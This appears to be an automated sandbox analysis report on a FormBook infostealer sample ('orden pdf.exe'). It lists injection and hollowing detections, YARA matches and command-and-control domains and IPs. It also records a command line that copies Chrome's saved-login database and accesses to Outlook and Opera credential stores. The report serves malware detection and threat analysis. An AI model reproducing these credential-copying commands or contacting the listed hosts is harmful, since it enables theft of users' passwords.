Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_3_00CE00AD mov ecx, dword ptr fs:[00000030h] 5_3_00CE00AD
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_3_00CE00AD mov eax, dword ptr fs:[00000030h] 5_3_00CE00AD
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_3_00CE01CB mov eax, dword ptr fs:[00000030h] 5_3_00CE01CB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_001AA66C
Enables debug privileges
Source: C:\Users\user\Desktop\orden pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00198189 SetUnhandledExceptionFilter, 0_2_00198189
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_001981AC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00198189 SetUnhandledExceptionFilter, 1_2_00198189
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_001981AC
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_013981AC

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: cx9l_rq2dula.exe.3.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Users\user\Desktop\orden pdf.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\orden pdf.exe Thread register set: target process: 3388 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\orden pdf.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\orden pdf.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: C90000 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AB106 LogonUserW, 0_2_001AB106
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00173D19
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B411C SendInput,keybd_event, 0_2_001B411C
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B74BB mouse_event, 0_2_001B74BB
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe' Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe' Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_001AA66C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_001B71FA
Source: explorer.exe, 00000003.00000000.239214907.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: orden pdf.exe, explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001965C4 cpuid 0_2_001965C4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW, 0_2_001C091D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001EB340 GetUserNameW, 0_2_001EB340
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_001A1E8E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0018DDC0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: orden pdf.exe Binary or memory string: WIN_81
Source: orden pdf.exe Binary or memory string: WIN_XP
Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: orden pdf.exe Binary or memory string: WIN_XPe
Source: orden pdf.exe Binary or memory string: WIN_VISTA
Source: orden pdf.exe Binary or memory string: WIN_7
Source: orden pdf.exe Binary or memory string: WIN_8

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_001C8C4F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_001C923B
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 339334 Sample: orden pdf.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 8 other signatures 2->74 10 orden pdf.exe 4 2->10         started        process3 file4 54 C:\Users\user\...\DeviceCensus.exe.exe, PE32 10->54 dropped 56 C:\Users\user\AppData\Roaming\...\.url, MS 10->56 dropped 88 Maps a DLL or memory area into another process 10->88 14 orden pdf.exe 10->14         started        17 orden pdf.exe 10->17         started        signatures5 process6 signatures7 90 Modifies the context of a thread in another process (thread injection) 14->90 92 Maps a DLL or memory area into another process 14->92 94 Sample uses process hollowing technique 14->94 96 Queues an APC in another process (thread injection) 14->96 19 explorer.exe 1 6 14->19 injected process8 dnsIp9 58 www.hydrabadproperties.com 91.195.240.94, 49762, 49763, 49764 SEDO-ASDE Germany 19->58 60 unbelievabowboutique.com 34.102.136.180, 49745, 80 GOOGLEUS United States 19->60 62 5 other IPs or domains 19->62 46 C:\Users\user\AppData\...\cx9l_rq2dula.exe, PE32 19->46 dropped 48 C:\Program Files (x86)\...\cx9l_rq2dula.exe, PE32 19->48 dropped 76 System process connects to network (likely due to code injection or exploit) 19->76 78 Benign windows process drops PE files 19->78 24 systray.exe 1 18 19->24         started        28 wscript.exe 1 19->28         started        30 cx9l_rq2dula.exe 19->30         started        file10 signatures11 process12 file13 50 C:\Users\user\AppData\...\KN2logrv.ini, data 24->50 dropped 52 C:\Users\user\AppData\...\KN2logri.ini, data 24->52 dropped 80 Detected FormBook malware 24->80 82 Tries to steal Mail credentials (via file access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 86 3 other signatures 24->86 32 cmd.exe 2 24->32         started        36 cmd.exe 1 24->36         started        38 DeviceCensus.exe.exe 28->38         started        signatures14 process15 file16 44 C:\Users\user\AppData\Local\Temp\DB1, SQLite 32->44 dropped 64 Tries to harvest and steal browser information (history, passwords, etc) 32->64 40 conhost.exe 32->40         started        42 conhost.exe 36->42         started        66 Multi AV Scanner detection for dropped file 38->66 signatures17 process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.94
unknown Germany
47846 SEDO-ASDE true
34.102.136.180
unknown United States
15169 GOOGLEUS true
3.223.115.185
unknown United States
14618 AMAZON-AESUS false

Contacted Domains

Name IP Active
unbelievabowboutique.com 34.102.136.180 true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 3.223.115.185 true
www.hydrabadproperties.com 91.195.240.94 true
www.wwwswty6655.com unknown unknown
www.huro14.com unknown unknown
www.bepbosch.com unknown unknown
www.unbelievabowboutique.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.hydrabadproperties.com/n7ak/ true
  • Avira URL Cloud: safe
unknown
http://www.bepbosch.com/n7ak/ true
  • Avira URL Cloud: safe
unknown